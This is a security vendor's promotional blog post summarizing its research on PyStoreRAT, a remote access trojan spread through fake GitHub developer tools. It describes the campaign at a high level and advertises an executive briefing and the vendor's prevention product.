A New Supply Chain Threat Targeting Developers: What You Need to Know About PyStoreRAT 

Attackers are no longer relying on phishing emails or malicious documents to compromise organizations. They’ve shifted their focus to something far more powerful…the trust developers place in open-source tools and GitHub-hosted code. 

In Morphisec’s latest threat research, our team uncovered PyStoreRAT, a stealthy, modular Remote Access Trojan (RAT) delivered through weaponized GitHub repositories masquerading as development utilities and OSINT tools. The campaign reveals a strategic evolution in attacker behavior: compromising the people and platforms that power innovation. 

To help business and security leaders understand the implications of this threat, we’ve created a 2-page Executive Briefing that summarizes what PyStoreRAT is, how it works and what it means for your organization. 

What Makes PyStoreRAT a New Class of Threat? 

Unlike traditional malware that relies on malicious attachments or phishing lures, PyStoreRAT uses a stealth-first delivery chain. Here’s how it works: 

• GitHub repositories disguised as legitimate projects 
• Lightweight Python/JavaScript loader stubs that appear harmless 
• Fileless HTA execution via mshta.exe 
• A modular JS-based RAT capable of running EXE, DLL, MSI, Python, PowerShell, and more 
• Built-in evasion targeting CrowdStrike Falcon and modern EDR controls 

It’s fast, flexible, and engineered to blend seamlessly into developer environments… where traditional detection tools struggle the most.   

Why This Matters for CEOs, CIOs & CISOs 

PyStoreRAT demonstrates a growing trend: developers, engineers, and automation teams are now top-tier attack vectors. 

That means: 

• Open-source ecosystems can no longer be implicitly trusted 
• Compromised development environments can lead to supply chain compromise 
• Credential theft becomes the opening stage of modern ransomware 
• Script-based, fileless malware bypasses signature and behavior-based defenses 
• Developer workflows (from GitHub cloning to CI/CD pipelines) are increasingly at risk 

These attacks affect much more than IT infrastructure. They directly threaten intellectual property, cloud environments, software integrity, and business continuity.   

Inside the PyStoreRAT Campaign 

Our research uncovered a coordinated multi-month operation involving: 

• AI-generated repository content 
• Social promotion across YouTube and global forums 
• Artificial star/fork inflation to build trust 
• Multiple versions of loader stubs released over time 
• A rotating, multi-domain C2 infrastructure 
• Deployment of Rhadamanthys, a powerful information stealer, as a follow-on payload 

The result is a stealthy RAT that hides behind legitimate developer workflows, one that many organizations are not currently equipped to detect or stop.   

How Morphisec Stops PyStoreRAT Before It Executes 

Because PyStoreRAT relies on in-memory execution, obfuscated JS, mshta.exe, and modular payload delivery, it evades traditional EDR, antivirus, and sandbox-based tooling. 

Morphisec blocks it at the earliest stage using: 

• Its pioneering Automated Moving Target Defense (AMTD) deception technology
• Deterministic, pre-execution prevention 
• Memory-based deception and credential protection 
• Zero-impact protection for engineering workflows 

This means PyStoreRAT cannot assemble payloads, steal credentials, or launch next-stage malware, therefore eliminating the foothold before it begins.   

Get the Executive Briefing 

We’ve distilled the full technical analysis into a 2-page executive summary that business and security leaders can reference in: 

• Board briefings
• Risk committee discussions 
• Strategic planning sessions 
• Incident response tabletop exercises 
• Developer security program improvements 

Inside the brief, you’ll find: 

• High-level attack overview 
• Business implications and emerging risks 
• Executive takeaways 
• Recommended actions for CISOs and CIOs 
• How Morphisec prevents this threat 
• Indicators of compromise (IOCs) 

Get your copy of the executive briefing and book a personalized demo to see how Morphisec can help your organization guard against PyStoreRAT and other complex threats. 

About the author

Brad LaPorte

Chief Marketing Officer

Brad LaPorte is a seasoned cybersecurity expert and former military officer specializing in cybersecurity and military intelligence for the United States military and allied forces. With a distinguished career at Gartner as a top-rated research analyst, Brad was instrumental in establishing key industry categories such as Attack Surface Management (ASM), Extended Detection & Response (XDR), Digital Risk Protection (DRP), and the foundational elements of Continuous Threat Exposure Management (CTEM). His forward-thinking approach led to the inception of Secureworks’ MDR service and the EDR product Red Cloak—industry firsts. At IBM, he spearheaded the creation of the Endpoint Security Portfolio, as well as MDR, Vulnerability Management, Threat Intelligence, and Managed SIEM offerings, further solidifying his reputation as a visionary in cybersecurity solutions years ahead of its time.